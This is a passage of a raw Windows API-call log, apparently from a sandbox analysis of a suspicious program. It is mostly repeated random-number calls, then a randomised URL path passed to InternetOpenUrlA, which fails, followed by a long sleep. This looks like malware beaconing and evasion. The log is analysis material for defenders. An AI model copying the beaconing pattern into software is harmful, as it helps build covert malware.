pbBuffer=0x46ffd5f) returned 0x0 [0270.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0270.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d50b9, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d50b9) returned 0x0 [0270.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0270.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0270.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0270.962] GetProcessHeap () returned 0x440000 [0270.962] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0270.962] lstrcpyA (in: lpString1=0x4724e0, lpString2="PPM" | out: lpString1="PPM") returned="PPM" [0270.962] lstrcatA (in: lpString1="PPM", lpString2="/Ylc0tgt1szzpsujnwgVjrrrk3R6PH9jg8IzoKdi4/6flO4gzu0of8vowcZdbShtrcSx/v4ow3qd8nrin2dxgrkqk3s7At3opmc33ykh/ZrHpxC9rs8ihX8n4j8r2w0gok2mpji9psa4r9893s46f8qce/" | out: lpString1="PPM/Ylc0tgt1szzpsujnwgVjrrrk3R6PH9jg8IzoKdi4/6flO4gzu0of8vowcZdbShtrcSx/v4ow3qd8nrin2dxgrkqk3s7At3opmc33ykh/ZrHpxC9rs8ihX8n4j8r2w0gok2mpji9psa4r9893s46f8qce/") returned="PPM/Ylc0tgt1szzpsujnwgVjrrrk3R6PH9jg8IzoKdi4/6flO4gzu0of8vowcZdbShtrcSx/v4ow3qd8nrin2dxgrkqk3s7At3opmc33ykh/ZrHpxC9rs8ihX8n4j8r2w0gok2mpji9psa4r9893s46f8qce/" [0270.962] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0270.962] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="PPM/Ylc0tgt1szzpsujnwgVjrrrk3R6PH9jg8IzoKdi4/6flO4gzu0of8vowcZdbShtrcSx/v4ow3qd8nrin2dxgrkqk3s7At3opmc33ykh/ZrHpxC9rs8ihX8n4j8r2w0gok2mpji9psa4r9893s46f8qce/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0270.962] GetProcessHeap () returned 0x440000 [0270.962] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0270.962] GetProcessHeap () returned 0x440000 [0270.963] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5050 | out: hHeap=0x440000) returned 1 [0270.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0270.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0270.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0270.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0270.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0270.964] Sleep (dwMilliseconds=0x12581) [0271.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0271.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.083] GetProcessHeap () returned 0x440000 [0271.083] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a18060 [0271.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a18061, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a18061) returned 0x0 [0271.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 